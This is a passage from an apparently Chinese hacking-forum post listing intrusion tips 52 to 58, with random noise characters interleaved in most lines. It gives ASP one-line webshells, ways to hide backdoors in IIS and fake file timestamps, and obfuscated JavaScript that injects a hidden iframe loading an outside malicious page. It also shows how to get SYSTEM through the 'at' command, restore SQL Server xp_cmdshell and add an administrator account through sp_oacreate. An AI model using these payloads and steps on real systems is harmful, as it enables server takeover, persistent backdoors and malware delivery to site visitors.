- l( y  `8 D0 r; H- ~- Ue).<%25Execute(request("l"))%25>& o+ i/ R; g) b* F8 s
f).<%if request("cmd")<>"" then execute request("pass")%>2 X: K9 a# ^3 P' A

9 R3 f5 O6 y  ]% h% E1 g# e; y52、at "12:17" /interactive cmd
8 e+ k; z8 h  s4 ^: B% z执行后可以用AT命令查看新加的任务
3 x$ I5 k1 B; |0 Z4 M用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
7 W* O3 \  x* B9 Y0 o3 L7 l; R" ~% `: R5 g/ k$ r
53、隐藏ASP后门的两种方法: J; }4 p0 v4 B+ u% w( ^
1、建立非标准目录:mkdir images..\
- d! q1 ?! B4 D: |拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
* G0 v8 z% V& K9 q$ f通过web访问ASP木马:http://ip/images../news.asp?action=login3 O2 x* E* [; [3 R$ N- \1 Y
如何删除非标准目录:rmdir images..\ /s2 l. w' p8 P0 I( _2 ^% ^* ?
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:5 f7 x- A' l0 `8 m( J  U
mkdir programme.asp& d& E& O; M9 H1 e6 d" x
新建1.txt文件内容:<!--#include file=”12.jpg”-->6 T, H" l9 F: L1 v
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件7 M, I1 b+ z5 C: \' Y& I
attrib +H +S programme.asp, L9 I3 d7 U8 I$ J: p
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt9 y+ i& z. c# D* z

, ~6 R9 G/ r9 P. t" S2 ?% I& L54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
0 C, j/ n1 l/ G5 V* U然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。7 T5 ~; E( Y; b! a. \

+ M5 k( x% N" c2 m55、JS隐蔽挂马
/ J0 g5 W* t" _9 u9 n( y# V9 G1.
- H6 g* s! t6 X3 T0 k- o' g! K; Xvar tr4c3="<iframe src=ht";
4 E. e$ h, g9 c7 Y$ o  str4c3 = tr4c3+"tp:/";
' q" j1 Y5 i+ I, g+ e' n9 A; i+ Ptr4c3 = tr4c3+"/ww";
5 i" @( V/ J2 R* b; Str4c3 = tr4c3+"w.tr4";
2 `/ k8 K2 _$ B3 O6 Z  xtr4c3 = tr4c3+"c3.com/inc/m";
' v9 A& v' D: Gtr4c3 = tr4c3+"m.htm style="display:none"></i";
% T' x  _: a; W3 ktr4c3 =tr4c3+"frame>'";
0 d" |5 D: s2 u: ?6 Mdocument.write(tr4c3);
7 j; _9 ~8 W! D% ^避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
- k  g* D. W: r
9 X4 B* D8 x4 F  f( r' w2.
# M$ ~2 t) E$ h! ]$ B转换进制,然后用EVAL执行。如
- Z: ?- P! C) Teval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");9 f4 d- x/ u# ]2 K% {: Y0 }5 j4 J: Q
不过这个有点显眼。' a3 A  v) d* X: {, w
3.
) t& T- u) Z6 D  Q2 \" t$ {document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
' ]  o: I4 m5 E最后一点,别忘了把文件的时间也修改下。
# L- G1 O' e3 P4 @  `8 f: ^7 e% A: a4 M6 s. h
56.3389终端入侵常用DOS命令
( `" H$ v: D& y) `taskkill taskkill /PID 1248 /t
, @8 N9 V; p1 W- g  b" T& v( R: K8 L! a: v, y0 B, V
tasklist 查进程; o+ M) L- C9 t4 _* U" r

$ ?+ d  W$ B+ E9 z. l" x$ C( }cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
; A6 N8 j& T' `7 n( piisreset /reboot! r; C: t" m  R! f. o5 j: ?
tsshutdn /reboot /delay:1    重起服务器
6 H' I! c' x# q& S
* `" T% I) v% g9 }8 c, s. D3 |% Alogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
0 _) p6 G3 K8 t5 Q' Q! X/ S8 R% q$ V' M8 f2 P( z
query user 查看当前终端用户在线情况
7 u6 }6 q+ ?; v9 [8 U
$ h: X5 O) S' H( Q+ f, A+ k, I要显示有关所有会话使用的进程的信息,请键入:query process ** g4 i9 e6 K2 B- J# b4 E

! B' J: c7 F: E, A) k要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2% A+ g. k- k! V# L- L7 x+ J

; E; n3 ^, o% v% [9 v+ P要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
( n0 R' a  D  g% A
& e; p" _& j9 F6 ^& O. V' z要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
3 Y/ k. W0 ~" Y* i' W
! n) M+ q3 }* V3 G0 [3 j' B  j命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
, F5 V2 D) a' n, s, I4 u9 |1 v5 a/ k3 |2 l9 `' N
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
" C4 l' i% ^* ?. M+ N8 z/ X% [, d2 K! J1 U2 b: ?' l9 l8 D
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。" s/ l6 f! ?# c! ~0 K$ u
/ h5 ^6 q" p% o
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
  L# k* J- q6 G; @# h- Z1 ~" n/ w, L: a) D6 t
56、在地址栏或按Ctrl+O,输入:6 g) }- D/ V" T& V2 v" o
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
* n) k+ X9 o, ^/ Z3 m" s1 q
: N) `/ m8 @2 z8 ?源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
* v3 A) {/ g3 y. l: V% J5 b" a
1 e8 _$ V, l6 ~9 ^3 H6 Q57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
9 p! }5 {' E7 s3 O( r- Q. r* @用net localgroup administrators是可以看到管理组下,加了$的用户的。
, D7 i- [  C& C$ V
( q% H: V* V1 \+ ^# _5 d58、 sa弱口令相关命令9 H3 y6 ~' f! P* e" m* ]: L

: j, ^. B9 Y" |1 |% N" c9 z8 ?一.更改sa口令方法:% J2 D4 _! {" a" ~( N" x" E( n
用sql综合利用工具连接后,执行命令:4 g8 m# K2 J! k& T
exec sp_password NULL,'20001001','sa') S, w2 x! \. }* ^0 @! S2 C* g
(提示:慎用!)
3 E& n8 m. c% N9 ]2 B& h$ t3 ^$ j, y* j6 J" X+ v4 p
二.简单修补sa弱口令.: N% F* v0 n1 F

" z" s3 ?9 ~: F' \" j4 G! C方法1:查询分离器连接后执行:& s8 Q% j: t0 i* a5 L
if exists (select * from0 Y$ Y, w% F( I& a, ?- Z( E
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
4 F  ~, w5 }' K1 j' N! }) C1 xOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
4 H7 |9 C* A% y) x9 E0 B2 O0 u! g' u
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'2 A( i0 r2 e* Z- B4 k
$ X6 ]( r3 y! [6 N+ e- h# v
GO
3 ~6 g0 ~9 F% k) M1 m7 w) ]$ m0 O5 M2 r
然后按F5键命令执行完毕
# k, k7 o8 e8 ^  l" X9 ?# T
' }4 b% ]) @) z+ G4 f* ~) ^0 s* x% E方法2:查询分离器连接后
+ ]$ N$ f- u8 ^/ x7 C& A" B第一步执行:use master7 R0 M$ z* K+ V! W
第二步执行:sp_dropextendedproc 'xp_cmdshell'
+ g9 T; i& R/ t: g然后按F5键命令执行完毕
) |% ^; m. e$ ^1 N8 i
) V0 \( x6 n5 W
* G4 ?) `  U$ H三.常见情况恢复执行xp_cmdshell.8 k3 J2 \7 X% w, S; V4 E

. S8 q% ]5 |5 C$ A; ?8 O5 i) G' k
1 未能找到存储过程'master..xpcmdshell'.
+ r4 G" M# ~6 R   恢复方法:查询分离器连接后,
; D- Q1 z. Y: Z; R; e9 `- w- @第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int6 g; q# t5 q3 g, i$ h$ i
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
  H( V9 k- P; O+ _然后按F5键命令执行完毕( R$ S( F! M" ]4 h

* V# x; \# X1 c0 M! I! `2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)9 u) j8 J( n2 Q- B
恢复方法:查询分离器连接后,
' }" ~5 T8 N. U6 b: Y9 d' b第一步执行:sp_dropextendedproc "xp_cmdshell"
& ^/ ?' j5 y; l第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
3 ^. A) b  t. Q3 W6 b然后按F5键命令执行完毕/ d, J) m+ X" F" s) v& F

4 Y% w  N/ ]) P+ |9 `2 W; u! }3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)0 ?: U: Q4 G$ y4 h9 Y9 M% c
恢复方法:查询分离器连接后,+ S, v  A* e: U3 O9 K+ E
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'3 p/ x2 S* h$ R  T! j/ c1 s
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'           
# m7 f: L" j! z' r0 v: q4 m" X然后按F5键命令执行完毕
9 _; O5 D2 w9 d+ ^0 U
: w/ Z1 X! n  p7 n" V四.终极方法.
. ?+ w; B3 q1 H4 J* ?如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:; o0 K9 z' k/ w) }4 v) v
查询分离器连接后,% m" d0 c; N6 F
2000servser系统:& g; Q7 ^: R; O$ H" b; b/ I
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
0 m2 T% F% u. `7 Q7 I8 W/ Q: ]) ~5 v, ?
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
2 x' O% c* M% V/ S4 ]/ M6 ], @, m
! j% U- C8 n, `$ `; Fxp或2003server系统:
% ~4 G  l9 N6 d/ o4 v
7 y0 r5 a9 [* k; Q) w( I; jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'1 f; n' h% Z/ b  V

" G3 D- m( P) g1 U6 J' Bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'# m) z' b- j' W" D1 r
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表